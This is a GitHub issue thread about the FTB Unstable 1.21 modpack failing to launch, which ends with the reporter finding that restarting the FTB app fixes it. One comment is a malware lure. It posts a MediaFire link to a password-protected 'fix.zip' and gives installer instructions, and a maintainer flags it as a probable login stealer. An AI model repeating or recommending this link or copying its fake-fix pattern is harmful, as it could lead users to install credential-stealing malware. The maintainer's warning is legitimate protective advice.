### ISSUE TITLE
Modpack just refuses to open

### ISSUE THREAD

**Issue by CalyRahl** [FTBTeam/FTB-Modpack-Issues#5679]
### Modpack

FTB Unstable 1.21

### Modpack version

1.0.1

### Has the pack been modified

No

### Log Files

[console.log](https://github.com/user-attachments/files/16745159/console.log)

### Describe the bug

The game simply.....does not open when launched.

### Steps to reproduce

Click 'Play'

### Expected behaviour

No crashing during startup

### Screenshots

![image](https://github.com/user-attachments/assets/ee375b92-5232-4bd1-af7c-4524c0952f58)

### Additional information

I have 9GB of RAM allocated. No available updates of any kind to java (not minecraft but the actual java you download off oracle). I have no issues with other modpacks, just this one for some reason.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CalyRahl** [comment]
Okay apparently just closing the FTB app and reopening fixed it?????????? Not sure if i should keep this open or not incase it happens again..

**Comment by Gaz492** [comment]
> Okay apparently just closing the FTB app and reopening fixed it?????????? Not sure if i should keep this open or not incase it happens again..

If its working now, feel free to close this issue.

Just as a side note, if you downloaded the file that other person linked to, please run a malware scanner on your pc as it looks like it might be a login stealer, I would also recommend changing your passwords if you did download and open the file.

**Comment by CalyRahl** [comment]
Oh yes, dont worry, thankfully im knowledgeable enough to not click on unknown links (that are obviously scams) LMAO. It was weird enough to me that it was commented almost instantly after creating this. Anyways, yeah i got no idea why the modpack wouldnt run until restarting the app. Thank you though :3
